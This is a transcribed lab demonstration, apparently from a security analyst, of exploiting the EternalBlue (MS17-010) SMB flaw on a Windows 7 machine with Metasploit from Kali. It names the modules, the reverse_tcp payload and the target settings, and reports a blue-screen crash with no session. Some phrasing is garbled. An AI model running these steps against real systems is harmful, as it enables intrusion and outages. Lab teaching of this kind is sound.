security analyst in Indian cybersecurity solutions. Today, I will demonstrate the EternalBlue vulnerability exploitation. So, how does EternalBlue exploit work? The vulnerability works by exploiting the Microsoft Server Message (SMB) Server Message Block 1.0, and SMB is a network file sharing protocol that allows the applications on a computer to read and write to files and to request services that are on the same network. Now I will try to exploit this eternal vulnerability thorough practically. Now I will go to the Kali terminal. This is the Kali terminal, and this is the Windows 7, the victim. Okay, and this is the IP of Windows 7. Now I will open the MSF console prompt. The MSF console prompt is opening now. Okay, now the prompt has been opened. Now if I search the vulnerability that we have found out through nmap scan, search ms17-010. Okay, if I search it, I can find out that these are the auxiliary scanner module that I have to use this scanner module to check that the victim is injectable by this ms17-010 or EternalBlue vulnerability is injected or not. Okay, then I am copying this auxiliary scanner module, copy it, use it, then set the payload. The payload is Windows/meter /reverse_TCP. And the options I have to set it. The options, in the options menu, I have to set the remote host, set rhosts. Rhost is the victim's IP, that is the 70192.168.0.112. Now if I again see the options, so everything is now set up there. rhost has been set up. So now if I click on the exploit, I can see the host is likely vulnerable to MS17-010. So I can start my exploitation now. So I will now use that script exploit module. I will use this exploit Windows SMB17 EternalBlue, this module, okay, to exploit the EternalBlue vulnerability. Now if I use it, now set the payload again, Windows meter /reverse_TCP. Now if I type the options, so here I have to set the rhosts, set rhosts 192.168.0.112 rhosts. Again if I type the rhosts, so rhosts has been set. Our port is 445, the target port, and the rhost is the target address, the victim's IP. Now if I exploit it, so let's see, started reverse TCP handler on 192.168.2.4, host is likely vulnerable. So connection of to target for exploitation established, connection established, triggering. So if I see on the victim system, I can see this is the blue screen. A problem has been detected, Windows has been shut down to prevent damage to your computer. So this is the blue screen of death. The systems will crash down unintentionally. Okay, and this is called the blue screen of death or EternalBlue exploitation, vulnerability exploitation. And this system now, this is a victim system, will now automatically restart, will take its restart. So connecting to target for exploitation has been completed. So this is so exploit has been completed, but no session was created. In blue screen of death exploitation, there will be no session will be created, only the exploitation will happen. Okay, so that's all everyone, thank you.